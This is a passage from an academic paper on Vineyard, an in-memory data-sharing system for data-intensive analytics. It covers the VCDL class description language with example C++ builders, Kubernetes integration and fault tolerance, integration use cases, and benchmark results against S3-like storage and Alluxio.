liberate users from such an interminable integration\nburden, Vineyard provides an IDL (intermediate description languages) named Vineyard Class\nDescription Language (VCDL). Inspired by Protobuf, VCDL allows users to describe the shared\nobjects and the methods over objects once, then generates the boilerplate codes automatically for\ndifferent programming languages. With VCDL, users can define and implement new types of data\nstructures succinctly. To ensure the expressivity of VCDL, we design VCDL as a C++ dialect, which\nkeeps a majority of the features of C++, as shown in Figure 6. Like C++ class definition, a data\nstructure defined with VCDL ( i.e.,class) contains members and methods; objects are organized\nin acomposable fashion: they can be other user-defined data structures. To enable Vineyard code\ngeneration, we only add several built-in types and directive annotations into the dialect.\nBuilt-in data types. VCDL recognizes primitive types such as int,double andString as metadata\nentries. Besides primitive types, VCDL predefines object-related types such as Blob andRepeated\nto facilitate users to describe the components of their objects. A Blob represents a large binary\nobject with a given size, and is used to describe the actual payload of a shared object. A Repeated\nis a sequence container that repeats its field any number of times (including zero), and the order\nof the repeated values will be preserved. For example, column names of a dataframe (line 6 in\nFigure 7). This concept is from Protobuf, and it is helpful to group a bunch of objects together to\nachieve composability. With the primitive types, predefined types for objects and the composable\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.200:14 Wenyuan Yu et al.\n1// builders .h\n2template <typename T>\n3[[builder ( DataFrame )]] ColWiseDataFrameBuilder\n4 :public DataFrameBuilder {\n5 private :\n6 Repeated < String > names ;\n7 Repeated < ArrayBuilder <T>> col_builders ;\n8 protect :\n9 DataFrame seal () {\n10 DataFrameBuilder :: set_names ( names );\n11 DataFrameBuilder :: set_cols ( col_builders );\n12 return DataFrameBuilder :: seal ();\n13 }\n14 public :\n15 void addCol ( ArrayBuilder <T> col , String col_name ) {\n16 names . push_back ( col_name );\n17 // Enable zero - copy if possible .\n18 col_builders . emplace_back ( col );\n19 }\n20};\n21\n22template <typename T>\n23[[builder ( DataFrame )]] RowWiseDataFrameBuilder\n24 :public DataFrameBuilder {\n25 private :\n26 Repeated < String > names ;\n27 Repeated < ArrayBuilder <T>> col_builders ;\n28 protect :\n29 DataFrame seal () {\n30 DataFrameBuilder :: set_names ( names );\n31 DataFrameBuilder :: set_cols ( col_builders );\n32 return DataFrameBuilder :: seal ();\n33 }\n34 public :\n35 void setSchema ( Repeated < String > schema ) {\n36 names = schema ;\n37 cols_builders . resize ( names . size ())\n38 }\n39 void addRow ( Repeated <T> row ) {\n40 for ( size_t i =0; i< row . size (); ++i) {\n41 cols_builders [i]. push_back ( row [i])\n42 }\n43 }\n44};\nFig. 7. An example of VCDL builders.\ndesign, complex objects in data processing systems can be hierarchically mapped to Vineyard ’s\nobject types and make it convenient to integrate and share with Vineyard .\nAnnotation shared .In VCDL, classes that annotated with shared annotation mean that systems\ncanPUT/GET objects of these types to/from Vineyard for sharing. All of their members with shared\nannotation will be kept as metadata in Vineyard and shared across systems and hosts. Other mem-\nbers without annotations can be reconstructed from members with shared annotation, e.g.,len\n(line 6) can be re-calculated by dividing the size of Blob bby the size of type Twithout needing\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.Vineyard: Optimizing Data Sharing in Data-Intensive Analytics 200:15\nto keep its value in Vineyard . All object types that are annotated with shared in VCDL must be\nimmutable, since objects in Vineyard cannot be modified once been sealed.\nAnnotation builder .To construct an instance of the type ( e.g.,DataFrame ) defined by VCDL, users\ncan implement specific classes tagged with builder annotations ( e.g.,builder(DataFrame) ), and\nprovide methods for an upstream task to build the data structure. As shown in Figure 7, users can\nwrite different builders to support a variety of scenarios. A seal() method must be provided in\neach builder to return the final immutable object from it. Base builders that directly interacts with\ntheVineyard client are automatically provided by Vineyard (e.g.,ArrayBuilder, DataFrameBuilder).\nAs mentioned in§4.1,Vineyard provides a memory allocator to allow memory allocation on its\nshared memory pools during the builder processes, to achieve zero-copy data sharing. VCDL\ncode generation can leverage such zero-copy ability. For example, in the line 18 of Figure 7, the\nArrayBuilder will check if the column is already in the Vineyard ’s shared memory poll, and avoid\ncopying when possible. Builders can be nested, since Vineyard objects are composable ( e.g.,member\ncol_builders of class ColWiseDataFrameBuilder<T> in Figure 7).\nCode generation. With VCDL, Vineyard can generate most of the glue code required by integration.\nThus, users can focus on the data structure they want to share. Specifically, the benefits of Vineyard\ncode generation are three-fold: (i) produce common formats; (ii) generate boilerplate code; (iii)\nenable cross-language optimizations.\nProducing common formats . To get an object put by an upstream system, the downstream system\nshould understand the data type of the object. For systems that adopt C++ as their programming\nlanguage, they can directly invoke the methods of data structures defined in VCDL, as VCDL is a C++\ndialect. To work with systems written in other languages, Vineyard will generate a new class defini-\ntion in their languages to access the methods and implementations defined in VCDL. VCDL wraps\nclasses described in VCDL as native classes in multiple guest languages instead of re-implementing\nthem in another language. It first leverages libclang [ 42] to get the ASTs (Abstract Syntax Trees) of\nVCDL classes to figure out the classes, members, and methods that need to be exposed to the guest\nlanguages for data access and creation. It then maps each class annotated with [[shared]] to a\nnative data type ( e.g.,interface for Java, struct for Rust) in the guest languages, and generates\nan FFI wrapper for each method that is annotated with [[shared]] in VCDL. Currently, VCDL sup-\nports C/C++, Java, Python and Rust as guest languages. When adding support for a new language,\nVCDL only requires to develop a code generator that handles the primitive type mappings and can\ngenerate classes and method wrappers in the guest language from the ASTs generated by libclang.\nGenerating boilerplate code. As discussed above, without Vineyard ’s code generation, users who\nwant to share intermediate data between systems have to write a lot of boilerplate code like field\ngetter and setter, which is common in cross-language wrapper generators e.g.,SWIG [ 18]. With the\nVCDL code generator in place, Vineyard first generates a common type of the class with annotation\nshared , then generates getters and setters for members tagged with annotation shared . Given a\ncommon type between upstream and downstream systems, users can always get the type defined\nin VCDL without re-implementing them manually. Moreover, the VCDL code generator can also\nhandle the generic types ( i.e.,thetemplate in C++ and Generics in Java) across languages. Gener-\nics is an essential language feature for the implementation of data processing systems. However,\nthe programming principles of generic may vary a lot in different programming languages ( e.g.,\nC++ and Java), and it is non-trivial to generate safe and efficient cross-language interfaces. Instead\nof simply mapping C++ template instantiations to parameterized types in Java, the VCDL code\ngenerator generates a unique class in Java for each instantiation of the same C++ template to\navoid type errors in native code.\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.200:16 Wenyuan Yu et al.\nEnabling cross-language optimizations. To ensure the performance, the VCDL code generator en-\nables optimizations to be applied across the boundaries between languages. The VCDL code\ngenerator reads annotated VCDL files and creates wrapper code (glue code) to make the corre-\nsponding C/C++ libraries available to other guest languages or to extend C/C++ programs with\na scripting language. Code generated for LLVM-based languages ( e.g.,C/C++, Rust) can be com-\npiled into LLVM bitcode (IR), and can be optimized and linked at the IR level with the help of\nthe LLVM LTO (link-time optimizations). For JVM-based languages, translated functions can be\noptimized ( e.g.,inlining) with the code of the target data processing system by JVM JIT. In addition,\nit also allows a large proportion of simple yet performance-critical routines ( e.g.,iterators) can be\ntranslated to efficient JVM bytecode. Fortunately, with the sun.misc.Unsafe mechanism of Java,\nlarge payloads/blobs can be also memory mapped off-heap and efficiently accessed from JVM. If\nfunctions cannot be translated, Vineyard will fall back to JNI (Java Native Interface) calls.\nDiscussion. With VCDL, integration is intuitive. Users first define required data structures (types)\nin VCDL, then they can directly implement their applications on generated data structures, or\nconvert the defined data structures to the existing native types in custom wrappers. With payload\nsharing, users just need to “cast\" the generated types to the native types. Such casting is zero-\ncopy and only requires to manipulate their metadata. With method sharing, users need to wrap\nmethods of native types with methods of generated types, which is also zero-penalty. If users fail\nto provide VCDL files for some reasons, Vineyard provides a FUSE driver that encapsulates the\nVineyard client to provide file system APIs, as shown in Figure 3. Since the FUSE driver provides\nfilesystem interfaces, objects have to be serialized as buffered bytes when users read/write objects\nfrom/to Vineyard , while buffered bytes will be automatically deserialized as objects when the file\nhandle are closed.\n4.3 Working in cloud-native environments.\nIn the cloud-native era, big-data analytics jobs are usually deployed as containerized applications,\nwhich are orchestrated by workflow engines ( e.g.,Apache Airflow [ 27], Dagster [ 21], Kedro [ 9]),\nand managed by Kubernetes. Vineyard is deployed as a Deployment on Kubernetes and managed by\nthe Kubernetes Operator [ 14]vineyard-operator . After applications have been submitted to a Ku-\nbernetes cluster, Vineyard will place the application pods near where its required inputs are located.\nBesides, by integrating with the workflow orchestration engine, Vineyard archives application-level\nfault tolerance. In this subsection, we will discuss how Vineyard addresses challenges proposed\ninC#3 in§3.2 in cloud-native environments.\nLocality awareness on Kubernetes. Vineyard archives alignment between application workers\nand their required inputs by integrating with the scheduler of underlying cloud-native infrastructure,\ni.e.,Kubernetes. The collections of Vineyard objects that will be shared across hosts are abstracted\nand organized as Custom Resource Definitions (CRDs) [ 13] in Kubernetes, making them observable\nand accessible from the scheduler component of the Kubernetes cluster. Developers can specify the\nrequired input objects for a task in the specification by the k8s.vineyard.io/required , which\nindicates the prerequisite tasks that generated the required inputs for this task. Once the upstream\ntasks have created outputs as CRDs, the current task itself will be ready for being scheduled. As\nshown in Figure 8, the task Brequires a CRD of type DistDataFrame<int> generated by task A.\nOnce the CRD generated by task Ais available, task Bwill be ready for being scheduled..\nVineyard implements a data-aware scheduling policy in a scheduler plugin for Kubernetes [ 5].\nSpecifically, given a task, Vineyard partitions required collections into local object collections and\nassigns collections of local objects to workers of this task. The scheduler plugin then inspects the\nlocation metadata from CRDs of those local objects and assigns the highest priority to the host\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.Vineyard: Optimizing Data Sharing in Data-Intensive Analytics 200:17\napiVersion: apps/v1 \nkind: ReplicaSet \nmetadata: \n name: A-extract \nspec: \n replicas: 4 \n template: \n spec: \n containers: \n - image: mysql-dumper:latest \n ... apiVersion: apps/v1 \nkind: ReplicaSet \nmetadata: \n name: B-PowerGraph-PR \n labels: \n k8s.orchard.io/required: \n - created-by: A-extract \n type: DistDataFrame<int> \n - ... \nspec: \n replicas: 4 \n ... \n \nAB\n $ kubectl get objects.orchard.io -ltype=\"DistDataFra me<int>\" \nNAME TYPE CREATE-B Y AGE \no000052f987f48706 DistDataFrame<int> A-extrac t 1s. \nFig. 8. Program a Workflow DAG on Vineyard\nwhere the required local objects are located for each worker of this task. In this way, the scheduler\ncan respect the locality of the required inputs and reduce the data transfer costs. As the cluster\nresources are dynamically changing and tasks may have their own access pattern on distributed\ncollections, remote data accessing is unavoidable. Vineyard ’sCollection abstraction in§4.1 fits\nsuch scenarios, and required objects will be migrated from remote instances by Vineyard when\nneeded. In environments where external Kubernetes scheduler plugin is not allowed to be deployed,\nVineyard provides a command line tool vineyardctl which accepts the workflow specification in\nYAML format and injects the node affinity annotations into the specification to route tasks as near\nto where their required inputs been placed as possible.\nVineyard implements workflow isolation with Session s, which is aligned with the Namespace\nmechanism in Kubernetes. Multiple sessions can be created in the same Vineyard cluster and each\nsession can be connected via its own UNIX-domain socket. Vineyard clients can only see and\nmanipulate objects in the connected session. When a workflow finishes and intermediate data can\nbe dropped, removing a session will clean up all objects in it.\nFault tolerance and data consistency. Failures are inevitable for big data analytics in a cloud-\nnative environment. Designed as an object store for intermediate data, Vineyard does not replicate\nobjects but provides the save(ObjectID,path) API and users can insert checkpoint tasks into their\nworkflows. Vineyard has been integrated with the failover mechanism of workflow orchestration\nengines. When application failure happens, the results produced by the last succeeded step are still\nkept in Vineyard and the workflow scheduler decides whether to reload data from checkpoints\nwith the load(path) API and rerun from the failed steps or restart from scratch.\nVineyard maintains an object dependency tree in metadata service and keeps a periodic heartbeat\nbetween instances. When Vineyard instance failure happens the heartbeat connection will be lost,\nthe failure would be detected by other instances and all objects that depend on objects resides\non the failed instance will be dropped recursively across the cluster. Tasks that get involved with\nthe garbage-collected objects will be marked as failed and the workflow scheduler will decide\nwhether to reload data from the last checkpoint and rerun affected tasks or propagate the error to\nusers. Vineyard uses external key-value storage ( e.g.,etcd [ 22], Redis, or Kubernetes CRDs) as the\nmetadata service backend, which is ACID-compliant and supports high-availability deployment.\nThus, the consistency and availability of metadata will not be affected by Vineyard instance failures.\nUsage patterns of big data systems. Big data analytics usually involves two kinds of objects:\nseveral large objects and many small objects. For extremely large objects, Vineyard provides the\nCollection abstraction mentioned in §4.1 where large objects are organized as a sequence of local\nobjects and can be handled by Vineyard as long as the local object can be fit into the memory of\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.200:18 Wenyuan Yu et al.\na single machine. Local objects that are not accessed by the data processing tasks can be spilled to\nexternal storage and will be automatically reloaded when been requested. Vineyard uses memory\nmapping to share a local object between clients and the server, thus the runtime overhead of get()\nis a constant no matter how large the local object is. For extremely large volumes of small objects,\ne.g.,millions of scalars and short bytes, Vineyard inlines their payloads into metadata to mitigate\nshared memory fragmentation, and Vineyard metadata service can process many metadata requests\nsimultaneously. Moreover, in Vineyard only objects that need to be shared between tasks will be\npersisted to the metadata service backend to reduce the overhead of creating too many entries.\nObjects that are only used by a single task will be kept in the local Vineyard server and will not\nbe synchronized across the cluster.\n5 USE CASES\nThis section describes some use cases for integrating Vineyard into data processing systems. Recall\nthat we introduce three types of commonalities for intermediate data across systems in §3. We first\nchoose three representative examples, each for one type of commonality, to show how Vineyard\ncan be easily and non-intrusively integrated to bridge different data processing systems.\nDask and PyTorch. Dask is a widely used package for distributed scientific computing. PyTorch\nis an efficient distributed machine-learning framework that operates on Numpy-like tensors with\nbuilt-in GPU and autograd support. It is common to use Dask for data preprocessing and PyTorch\nfor model training in machine learning applications. To share data from Dask to PyTorch, Dask\ngenerates Collection<VYTensor> inVineyard , and PyTorch consumes the Collection batch-by-\nbatch for training. Specifically, Dask represents each local object in the Collection as NumPy’s\nndarray , which shares the same memory layout with PyTorch’s Tensor . Therefore, the integration\nis straightforward. (i) We implemented a wrapper for numpy.ndarray to build VYTensor by coping\nthe blobs in numpy.ndarray toVineyard ’s shared memory as blobs, and construct VYTensor ’s\nmetadata using properties of the numpy.ndarray object. If allocator hooks are enabled, the copy\nof blobs can be further eliminated as the numpy.ndarray already resides in Vineyard ’s shared\nmemory. (ii) We implemented a wrapper to construct torch.Tensor from VYTensor using the\nblobs and metadata, without deserialization, data transformation and memory coping, as VYTensor\nandtorch.Tensor share payload commonality. (iii) Further, we implemented two wrappers to\nhandle collections, where the former builds a Dask’s distributed tensor as Collection while the\nlatter resolves a Collection to atorch.utils.data.Dataset . The integration takes 30 lines of\nPython code for Dask and 58 lines of Python code for PyTorch.\nGraphScope and GraphX . Both GraphScope and GraphX are distributed graph processing systems.\nGraphScope provides an efficient graph data structure ( Fragment ) implementation and a set of\nstandard built-in algorithms with superior performance, whereas GraphX supports various user-\ndefined algorithms and has been deployed earlier and widely deployed. It is common in our\norganization where GraphScope is used to execute some standard algorithms and GraphX is\ndeployed for user-defined algorithms in a single workflow. The graph data structure in GraphScope\nand GraphX has completely different memory layouts but roughly the same APIs (interfaces),\ne.g., Fragment.Vertices() and Graph.vertices() . These two graph processing systems are\nimplemented in different programming languages, in C++ and Scala, respectively. As described\nin§4.2, we implemented a thin C++ wrapper over VYFragment for GraphScope, and a wrapper\nover the generated JNI bindings by VCDL to align with GraphX’s APIs. Thanks to optimizations\ndescribed in§4.2 that ensure the efficiency of the JNI bindings, the integration finally removes\nthe cost of graph data transformation and archives 2 ∼10×speedup in running GraphX algorithms\ndirectly on GraphScope’s graph structure. To align the graph data structure in these two systems\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.Vineyard: Optimizing Data Sharing in Data-Intensive Analytics 200:19\nwith Vineyard , it takes 108 lines of C++ code for GraphScope and 208 lines of code for GraphX for\nimplementing the straightforward wrappers over VYFragment defined using VCDL.\nMars and ClickHouse . Mars is an open-source framework that scales Numpy and Pandas com-\nputation engines to large clusters. ClickHouse is a distributed SQL engine for running interactive\nqueries over big data. The former executes analytics tasks described operations over VYDataFrame\nusing Python, and the latter is utilized for ad-hoc SQL queries. Without Vineyard , to bridge these\ntwo systems, users usually need to save the result from Mars to external storage, then load it back\nto ClickHouse for mixed computations, incurring large I/O and data transformation costs. Mars\nhas been integrated with Vineyard and each chunk of its distributed dataframe is a VYDataFrame\nobject, composing a Collection across the cluster finally. However, due to the highly customized\ndata layout in ClickHouse’s MergeTreeTableEngine , it is non-trivial to integrate a plain columnar\ndata structure into ClickHouse. Vineyard provides a FUSE driver which provides a filesystem view\nfor objects stored in Vineyard , where a VYDataFrame can be read as a Parquet or ORC file using\nthe standard POSIX file system interfaces. Upon the FUSE driver, ClickHouse can directly consume\nthose VYDataFrame objects as Parquet files using its built-in Parquet reader, avoiding the cost\nof expensive I/O between external storage, without any modification to existing data processing\nengines. Further, ClickHouse can pass chunk access patterns ( e.g.,sequential scan) as hints to\nVineyard using the standard ioctl() API [ 2] to enable Vineyard to preload chunks that will be\naccessed shortly from external storage back to memory when spilling happens, improving the\noverlapping of computation and I/O time to archive better performance.\n6 EVALUATION\nIn this section, we report the performance of Vineyard over real-life complex data analytics jobs,\nmicro benchmarks about optimizations, the Vineyard integration with various data processing\nsystems, as well as our experience and observations of deploying Vineyard in a production envi-\nronment. The test bed is a Kubernetes cluster with over 1000 hosts. Each host is equipped with 2\nIntel 8269CY CPUs, 768GB RAM, 1TB SSD, and 50G NIC with RoCE support.\nData-intensive analytics jobs . We choose three real-life workflows to evaluate Vineyard :\n(1)A node classification job on citation network. Given the ogbn-mag data [ 38], we build a heteroge-\nneous citation network from Microsoft Academic Graph. To predict the class of each paper, we\nbuilding a machine learning pipeline and apply both the attribute and structural information of\ngraph data. The workflow involves graph analytics, graph neural network inference and subgraph\nextraction, and consists of the following steps: (i) defining graph schema and loading the graph;\n(ii) running graph algorithms (K-core and triangles counting) in libgrape-lite [ 24] to generate\nmore features for each vertex in the graph; (iii) executing a GNN model for vertex classification in\nGraphLearn [66]; and (iv) querying the concerned subgraph structure in GAIA [53].\n(2)A customer revenue prediction job . Based on user visiting behaviors from Google Play Store [ 1],\nthis job leverages a random forest model after several data cleaning steps to predict the per-user\nrevenues. The workflow contains: (i) cleaning the dataset ( e.g.,dropping missing values) using\nPresto SQL and combining necessary feature columns to a feature table; (ii) predicting the per-user\nrevenues using a pre-trained random forest model; and (iii) adopting the prediction results with\nfurther data analysis like the correlation between revenues and user devices. This workflow consists\nof 16 tasks which involve Presto [56], Pandas [16] and scikit-learn [55].\n(3)A fraudulent user detection job . As shown in Figure 1. Given a set of transaction records ( i.e.,\nuser-item pairs), the attributes of users as well as some users marked with known fraud labels, this\njob aims to detect more users involved in fraud. The workflow consists of: (i) creating a bipartite\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.200:20 Wenyuan Yu et al.\nTable 1. Results for End-to-end time & Data sharing time& Memory footprints.\nJobs Statistics End-to-end time (s) Data sharing time (s) Memory footprint (GB)\n# Size (GB) S3-like Alluxio Vineyard S3-like Alluxio Vineyard S3-like Alluxio Vineyard\nGraph Processing 255.5 5473.9 3978.4 1403.1 1797.5 411.4 6 1474.7 1684.9 1219.2\nRevenue Prediction 170.6 4472.4 1088.5 439.1 4151.2 767.3 117.9 311.8 526.9 290.1\nFraud Detection 617.9 16669.2 4401.6 1767.7 15137.6 2869.2 235.3 1120.8 1738.7 785.4\ngraph from the transaction records, where vertices are users and items, and edges represent trans-\naction relationships; (ii) running graph algorithms such as PageRank/SimRank in libgrape-lite [ 24]\nas new vertex attributes; (iii) selecting influential users and tailoring attribute tables in Pandas [ 16];\nand (iv) training a deep learning model to predict more fraudulent users in PyTorch.\nDatasets . For job (1), we use a heterogeneous network ogbn-mag [6]: it contains 4 types of entities,\nas well as four types of directed relations connecting two entities. For job (2), we apply the dataset\nfrom the Kaggle contest \"Google Analytics Customer Revenue Prediction\" [ 1] which consists of\na set of visiting records including visitID, location, device, time, visiting count, and other extra\nattributes. For job (3), we employ three real-life datasets from production which consist of all\ntransaction records in a period of 15days from Alibaba. Table 1 summarizes the statistics of the\ndataset in jobs (1) to (3). All datasets are stored as compressed CSV files.\nBaselines . We compared Vineyard with the following baselines: (i) S3-like object store service while\nall intermediate data is directly stored as files, and (ii) Alluxio , which works like a memory cache\nfor a file system which transparently caches frequently accessed data in memory, to improve\nthroughput and reduces I/O costs.\nExp-1: End-to-end and data-sharing performance. We first evaluate the end-to-end perfor-\nmance and data-sharing costs of Vineyard , and compare with its competitors on the cluster when\nthere were no other data analytics jobs running. Table 1 reports the end-to-end performance of\nthe three jobs. The end-to-end time means the runtime of the whole workflow, starting from\nloading data from files to outputting the final results. Here data-sharing costs include those for\ndata (de)serialization, I/Os, and data migration across hosts when the data processing system is not\nco-located with its inputs. In this experiment, we used 8workers for each job.\n(1) Overall, on the end-to-end performance side, Vineyard achieves 3.9∼10×speedups compared\nwith S3-like, 2.5∼2.8×speedups compared with Alluxio. This is mostly due to the effectiveness of\nVineyard in reducing data-sharing costs for complex and nested data structures. Note that job (1)\nshares the single graph in the whole workflow, rendering data-sharing time small with Vineyard .\nCompared with its competitors, Vineyard achieves a 28.8×speedup on average, up to 68.4×, on\ncross-system data sharing.\n(2)Vineyard requires less memory footprint in all jobs. Vineyard uses 70%∼90% memory com-\npared with S3-like, and 45% ∼72% memory compared with Alluxio. This benefit mainly comes\nfrom the memory mapping of Vineyard , which enables the zero-copy fashion for data sharing.\nAlluxio requires more memory due to its file-cache mechanism, while copying inevitably incurs\n(de)serialization costs.\nExp-2: Put and get objects. We further evaluated the data-sharing efficiency of Vineyard with\nthree widely used data structures: (1) a dataframe containing 6columns and 351million rows, (2)\na tensor with 2.1 billion elements, and (3) a graph of 60million vertices and 167million edges. Each\nelement of the dataframe object and the tensor object is stored as an int64 . A graph has two main\ndata structures: a HashMap to index its vertices and a sparse matrix in CSR (compressed sparse row)\nformat for its edges. Each object takes around 16GB space when loaded into main memory. We parti-\ntioned these objects into 2,4, and 8chunks and evaluated the time of building a collection to Vineyard\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.Vineyard: Optimizing Data Sharing in Data-Intensive Analytics 200:21\nDataframe Tensor Graph\n0.05.0Time(s)\n2482 4 8\n0.00.1Time(s)Build Meta Build Blobs\n(a) Building Objects\n0.010.05Time(s)\n2482 4 8\n105104103Time(s)Get Meta Get Blob (b) Getting Objects\nFig. 9. Efficiency of data sharing\nand getting it back from Vineyard . Note that we turn off the allocator when building the blobs in this\nexperience, otherwise the building blob time would be nearly zero. This is because there is no data-\ncopy cost when the allocator is enabled, and the only extra cost of malloc is less than 1𝜇𝑠on average\nwhich is comparable to the state-of-the-art malloc libraries. More specifically, the malloc cost is con-\nstant to either the size of a blob or the structure of data. Therefore, the building blob time is generally\nignored when the allocator is on. The results are reported in Figure 9. We find the following:\n(1) We observe that on average it takes over 99%of building time to save the blobs to the shared\nmemory of Vineyard . The time of saving metadata to the object store is quite small, i.e.,less than\n0.13s in all cases. Since there is no serialization cost when building these objects, storing objects in\nVineyard only involves memory copying and is very efficient (see §4.1).\n(2) The building time of objects scales very well. It takes 1.4s,1.3s, and 2.9s to build build a\nCollection of 8 local objects distributed evenly across hosts for the tested dataframes, tensors,\nand graphs, respectively. The graph building time is larger than others, as each fragment of the\ngraph object needs to build the same global vertex map, which alone accounts for around 5GB of\nmemory space.\n(3) Compared with the building time, the time of getting an object from Vineyard isnegligible ,i.e.,\nless than 0.9%for all cases. On average, it takes 0.034s,0.024s, and 0.038s to get the dataframe,\ntensor and graph objects, respectively. This is because getting objects is conducted in a zero-copy\nfashion via memory mapping, thanks to the decoupled design of objects.\n(4) The extra overhead by Vineyard for fetching objects from remote hosts is small as well. As dis-\ncussed in§4.3, in many cases, fetching remote objects are minimized with locality-aware scheduler\nplugin. When such fetches are necessary, we measured the cost of fetch() of100𝐾tensor objects\nsizes ranging from 8MB to 10GB over UDP, TCP and RDMA I/O connectors. Our evaluation shows\nthatVineyard can fully utilize the networking with little overhead (more than 94.61 %utilization of\nthe network bandwidth reported by the respective iperf3 (iperf-rdma for RDMA) tests).\nExp-3: Incremental object creation. We next evaluated the time and space efficiency of incre-\nmental object creation. Varying the number of rows from 88million to 352million of an existing\ndataframe with five columns, we built a new dataframe by inserting one new column into existing\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.200:22 Wenyuan Yu et al.\none. Varying the number of vertices from 148million to 2billion of a simple graph with an average\ndegree 5, we added 2properties for each vertex and convert it to a property graph [ 53]. Each\ndataframe or graph object has 8 chunks. We compared incremental object creation IncBuild with a\nbaseline ReBuild that re-builds new objects starting from scratch.\nFig. 10. Effectiveness of Incremental Object Creation.\nFig. 11. Performance of\nVCDL code generation for\ndifferent languages.\nAs shown in Figure 10, IncBuild outperforms ReBuild in time efficiency by 7.2×and 26.3×on\naverage, up to 8.4×and 33.9×for dataframe and graph, respectively. To build the new dataframe\nand graph objects, IncBuild on average saves 83.3%and 99.4%memory space usage since Vineyard\nobjects is composable and it can safely reuse and share existing blobs with the old dataframe and\ngraph objects (see§4.1). Moreover, the saved time and space get larger as the size of the original\ndata volume scales, indicating the necessity of composability and incremental object creation when\nfacing large-scale data.\nTable 2. Comparison of integration cost & performance with different systems.\nS3-Like Alluxio Vineyard Vineyard FUSE\nVCDL Type Systems 𝐶𝑖𝑛𝐶𝑜𝑢𝑡𝐶𝑖𝑛𝐶𝑜𝑢𝑡𝐶𝑖𝑛𝐶𝑜𝑢𝑡 LOCs𝐶𝑖𝑛𝐶𝑜𝑢𝑡\nVYTensorNumPy\n 1.0 0.5627 0.1057 0.2794 0.0026 0.0019 32*0.0949 0.1559\nPyTorch\n 1.0 0.3859 0.0669 0.1854 0.0029 0.0025 58*0.0746 0.1290\nXTensor\n 1.0 0.6881 0.0908 0.3195 0.0045 0.0588 46+0.0734 0.1782\nVYDataFrameArrow\n 1.0 0.6360 0.5964 0.6345 0.015 0.033 148*0.1279 0.3610\nPandas\n 1.0 0.7708 0.7516 0.7671 0.0139 0.023 68*0.5288 0.4434\nHDataFrame\n 1.0 0.5495 0.2282 0.2569 0.0035 0.1399 121+0.2187 0.3206\nVYFragmentGraphScope\n 1.0 1.9529 0.4002 1.8365 0.0038 0.0323 108*0.3721 1.7891\nPowerGraph\n 1.0 0.6442 0.8128 0.6359 0.0058 0.2334 144+0.8323 0.6010\nGraphX\n 1.0 0.3440 0.8049 0.1985 0.0039 0.1148 208+0.6700 0.1783\n1When benchmarking Alluxio, we preload data to MEMORY cache for read and use MUST_CACHE as write policy for its\nbest performance.\n2Data processing systems are implemented in different programming languages, including Python (\n ), C++ (\n ) and\nJava (\n ).\n3Vineyard is integrated into data processing systems by either payload sharing (annotated with ∗) or method sharing\n(annotated with+).\nExp-4: Integration cost and efficiency. To evaluate the cost of integration and performance of\nVineyard , we compared the integration cost (measured by lines of source code change [ 50]) and\nperformance (measured by execution time) between Vineyard and other solutions. We chose three\ntypes of data structures, i.e.,tensors, dataframes, and graphs, and three data processing systems\nfor each data type to evaluate the performance of exchanging intermediate data between those\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.Vineyard: Optimizing Data Sharing in Data-Intensive Analytics 200:23\nP20/(8.90s) P40/(10.01s) P60/(11.54s) P80/(17.61s) P100/(9425.64s)\nJobs taken from Alibaba production environment from 2022.06.01to2022.10.31\n(ordered by absolute end-to-end execution time)0.00.20.40.60.81.0I/O ratesJob\n1x2x4x8x16x\nEnd-to-end Acceleration\nFig. 12. Deploying Vineyard in production environments.\nsystems over different data storage mediums. For our baseline S3-like object store and Alluxio , we\nuse formats that are already supported by those data processing systems as the intermediate data\nformats, i.e.,HDF5 ,Parquet , and CSV, respectively. When integrating with Vineyard , we use VCDL\nto define VYTensor ,VYDataFrame , and VYFragment as the intermediate data formats.\nWe deployed a micro-benchmark with around 10GB intermediate data for each data type. Table 2\nshows the normalized execution time of data sharing as well as lines of code needed for integrating\nthe above data types with data processing systems. 𝐶𝑖𝑛represents the cost of get() from Vineyard\nand𝐶𝑜𝑢𝑡represents the cost of put() into Vineyard . We observed the following: (i) Vineyard\noutperforms baselines in both get() andput() . With payload sharing, both get() andput() only\ninvolve metadata manipulation without memory copy for blobs. While with only method sharing,\ntheget() is still fast, as no data (de)serialization or transformation is needed. However, the put()\nneeds extra costs to build system-specific data structure into Vineyard . (ii) Even without extra\nintegration, the FUSE driver can still help reduce the cost of data sharing, compared to exchanging\nintermediate data over external storage or file system-oriented caching systems, as the filesystem\nviews are carefully maintained in memory by Vineyard .\nFurther, we take Java as the target to evaluate the performance of cross-language optimizations in\nmethod sharing mentioned in §4.2. Figure 11 shows: (i) the overhead of cross-language method shar-\ning is low compared to naive FFI calls ( e.g.,VCDL-Java vs JNI); and (ii) calling into a foreign language\nis more efficient, compared with implementation in native languages ( e.g.,VCDL-java vs. Java).\nExp-5: Vineyard in production environments. We have deployed Vineyard in production\nenvironments and obtained a huge gain for optimizing intermediate data-sharing time in various\ndata-intensive workflows. Among them, many consist of steps including similarity search, graph\nanalytics, SQL and deep learning, and Hive-like data-warehouse tables are used as external storage.\nThose workflows are scheduled to a large Kubernetes cluster as around 40,000jobs within a day.\nThe scale of steps in these jobs ranged from 1to4000 workers, and the size of intermediate data\nvaries from several MBs to hundreds of GBs.\nFigure 12 demonstrates the statistics of the I/O cost ratio in end-to-end execution time for\nintermediate data sharing uniformly sampled from our daily production environments. With data-\nwarehouse tables, loading input data from tables and saving results into tables usually consume\nover 40%of the total execution time, and the number can be up to 95.06%in some cases when the\nend-to-end execution time gets longer. The I/O cost is high for both short-lived and long-running\njobs and sharing intermediate data is a common concern in big-data analytical applications. We\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.200:24 Wenyuan Yu et al.\nthen measured the acceleration after introducing Vineyard into intermediate data sharing. As\nshown in Figure 12, there is a stable acceleration effect for both short-lived and long-running jobs,\nand the end-to-end execution time can be accelerated up to 9.48×.\n7 RELATED WORK\nsingle-system vs.multi-system . Existing systems like Ray 